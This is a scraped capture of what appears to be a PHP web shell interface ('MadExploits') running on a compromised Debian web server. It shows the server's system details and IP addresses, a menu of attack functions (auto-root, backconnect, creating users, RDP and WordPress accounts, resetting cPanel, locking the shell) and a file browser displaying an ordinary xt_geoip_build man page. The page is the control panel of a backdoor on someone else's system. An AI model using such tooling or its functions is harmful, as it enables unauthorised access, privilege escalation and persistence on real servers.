Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.119.118.151
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
lib /
dkms /
xtables-addons /
2.12 /
build /
geoip /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
17.44
KB
-rw-r--r--
Makefile.am
112
B
-rw-r--r--
Makefile.in
16.69
KB
-rw-r--r--
xt_geoip_build
2.86
KB
-rwxr-xr-x
xt_geoip_build.1
1.27
KB
-rw-r--r--
xt_geoip_dl
287
B
-rwxr-xr-x
xt_geoip_dl.1
582
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xt_geoip_build.1
.TH xt_geoip_build 1 "2010-12-17" "xtables-addons" "xtables-addons" .SH Name .PP xt_geoip_build \(em convert GeoIP.csv to packed format for xt_geoip .SH Syntax .PP \fI/usr/libexec/xt_geoip/\fP\fBxt_geoip_build\fP [\fB\-D\fP \fItarget_dir\fP] [\fIfile\fP...] .SH Description .PP xt_geoip_build is used to build packed raw representations of the range database that the xt_geoip module relies on. Since kernel memory is precious, much of the preprocessing is done in userspace by this very building tool. One file is produced for each country, so that no more addresses than needed are required to be loaded into memory. The ranges in the packed database files are also ordered, as xt_geoip relies on this property for its bisection approach to work. .PP Input is processed from the listed files, or if none is given, from stdin. .PP Since the script is usually installed to the libexec directory of the xtables-addons package and this is outside $PATH (on purpose), invoking the script requires it to be called with a path. .PP Options .TP \fB\-D\fP \fItarget_dir\fP Specify a target directory into which the files are to be put. .SH Application .PP Shell commands to build the databases and put them to where they are expected: .PP xt_geoip_build \-D /usr/share/xt_geoip .SH See also .PP xt_geoip_dl(1)
Close